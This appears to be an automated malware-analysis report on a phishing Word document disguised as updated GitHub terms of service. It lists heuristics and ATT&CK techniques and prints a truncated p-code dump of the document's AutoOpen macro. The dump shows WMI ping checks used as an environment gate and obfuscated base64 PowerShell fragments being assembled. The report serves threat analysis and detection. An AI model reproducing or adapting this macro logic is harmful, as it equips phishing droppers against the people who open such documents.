Verdict: MALICIOUS
Risk Score: 90

Malware Insights

MITRE ATT&CK
- T1566.001 Spearphishing Attachment
- T1059.005 Visual Basic
The sample is a malicious Word document whose lure, framed as updated terms of service, is designed to convince the user to enable macros. The AutoOpen macro runs as soon as the document is opened and uses WMI (Win32_PingStatus) to test network connectivity, likely as a precursor to downloading and executing a second-stage payload. The embedded VBA code indicates an intent to execute arbitrary code.
Heuristics (5)

- VBA project contains no executable statements (low, 1 related finding) [OLE_VBA_MACROS]: Document contains a VBA project, but the extracted modules only contain attributes/options/comments and no executable statements.
- VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium) [OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for the old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Macro/content-enable lure (medium) [SE_ENABLE_LURE]: Document instructs the user to enable macros or editing, a common technique used by malware droppers to bypass Office macro security settings.
- Embedded URL (info) [EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - https://help.github.com/articles/github-terms-of-service-draft (in document text, OLE body)
  - https://help.github.com/articles/github-terms-of-service/ (in document text, OLE body)
  - https://github.com/contact/terms-of-service (in document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 74323 bytes | 88ceba162858783a843cd80ea9d96f7d75e771afb465656f5a3ba10766b54489 |

Preview script (first 1,000 lines of the extracted script):
```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Processing file: /opt/analyzer/scan_staging/60687642a1804fa3861960c27d91d382.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 1127 bytes
' Macros/VBA/module1 - 54462 bytes
' Line #0:
' FuncDefn (Sub AutoOpen())
' Line #1:
' OnError (Resume Next)
' Line #2:
' SetStmt
' LitStr 0x004A "Win32_PingStatus.Address='location.microsoft.com',ResolveAddressNames=True"
' LitStr 0x0009 "winmgmts:"
' ArgsLd GetObject 0x0001
' ArgsMemLd Get 0x0001
' Set ImogenPhotobiologic
' Line #3:
' StartWithExpr
' Ld ImogenPhotobiologic
' With
' Line #4:
' Debug
' PrintObj
' LitStr 0x000D "Status Code: "
' MemLdWith StatusCode
' Concat
' PrintItemNL
' Line #5:
' MemLdWith StatusCode
' LitDI2 0x0000
' Eq
' IfBlock
' Line #6:
' LitVarSpecial (False)
' St EtzelUnpolishedness
' Line #7:
' MemLdWith StatusCode
' LitDI2 0x0000
' Gt
' ElseIfBlock
' Line #8:
' LitVarSpecial (False)
' St EtzelUnpolishedness
' Line #9:
' ElseBlock
' QuoteRem 0x000D 0x0011 "No DNS Resolution"
' Line #10:
' LitVarSpecial (True)
' St EtzelUnpolishedness
' Line #11:
' EndIfBlock
' Line #12:
' EndWith
' Line #13:
' Line #14:
' SetStmt
' LitStr 0x001A "Win32_PingStatus.Address='"
' LitStr 0x000A "userdomain"
' ArgsLd Environ$ 0x0001
' Concat
' LitStr 0x001A "',ResolveAddressNames=True"
' Concat
' LitStr 0x0009 "winmgmts:"
' ArgsLd GetObject 0x0001
' ArgsMemLd Get 0x0001
' Set ImogenPhotobiologic
' Line #15:
' StartWithExpr
' Ld ImogenPhotobiologic
' With
' Line #16:
' Debug
' PrintObj
' LitStr 0x000D "Status Code: "
' MemLdWith StatusCode
' Concat
' PrintItemNL
' Line #17:
' Debug
' PrintObj
' LitStr 0x0009 "Address: "
' MemLdWith Address
' Concat
' PrintItemNL
' Line #18:
' MemLdWith StatusCode
' LitDI2 0x0000
' Eq
' IfBlock
' Line #19:
' LitVarSpecial (True)
' St VeraPostmeridian
' Line #20:
' MemLdWith StatusCode
' LitDI2 0x0000
' Gt
' ElseIfBlock
' Line #21:
' LitVarSpecial (False)
' St VeraPostmeridian
' Line #22:
' ElseBlock
' QuoteRem 0x000D 0x0011 "No DNS Resolution"
' Line #23:
' LitVarSpecial (False)
' St VeraPostmeridian
' Line #24:
' EndIfBlock
' Line #25:
' EndWith
' Line #26:
' Line #27:
' Ld EtzelUnpolishedness
' LitVarSpecial (True)
' Eq
' Ld VeraPostmeridian
' LitVarSpecial (True)
' Eq
' And
' IfBlock
' Line #28:
' Dim
' VarDefn UnstifflyGruesomest (As String)
' Line #29:
' LitStr 0x0001 "w"
' LitStr 0x0001 "u"
' LitStr 0x0001 "o"
' LitStr 0x0001 "p"
' LitStr 0x0001 "e"
' LitStr 0x0001 "y"
' LitStr 0x0001 "b"
' LitStr 0x0001 "a"
' LitStr 0x0001 "t"
' LitStr 0x0001 "x"
' LitStr 0x0001 "-"
' LitStr 0x0001 "s"
' LitStr 0x0001 "d"
' LitStr 0x0001 "c"
' LitStr 0x0001 " "
' LitStr 0x0001 "h"
' LitStr 0x0001 "r"
' LitStr 0x0001 "i"
' LitStr 0x0001 "n"
' LitStr 0x0001 "l"
' ArgsArray Array 0x0014
' St OutbowlTega
' Line #30:
' Dim
' VarDefn LucierDruidism (As String)
' Line #31:
' LitStr 0x0009 "SQBmACgAJ"
' St LucierDruidism
' Line #32:
' Dim
' VarDefn TetanineSpans (As String)
' Line #33:
' LitStr 0x0007 "ABQAFMA"
' St TetanineSpans
' Line #34:
' Line #35:
' Dim
' VarDefn ChancellorsvilleCalabresi (As String)
' Line #36:
' LitStr 0x000B "VgBlAHIAcwB"
' St ChancellorsvilleCalabresi
' Line #37:
' Line #38:
' Line #39:
' Dim
' VarDefn AutotomiesDemoniacally (As String)
' Line #40:
' LitStr 0x0013 "JAE8AbgBUAGEAYgBMAG"
' St AutotomiesDemoniacally
' Line #41:
' Line #42:
' Dim
' VarDefn ParcellingRubification (As String)
' Line #43:
' LitStr 0x0013 "UALgBQAFMAVgBlAFIAU"
' St ParcellingRubification
' Line #44:
' Ld PreinsultDreck
' Ld LucierDruidism
' Concat
' Ld TetanineSpans
' Concat
' Ld Cha ... (truncated)
```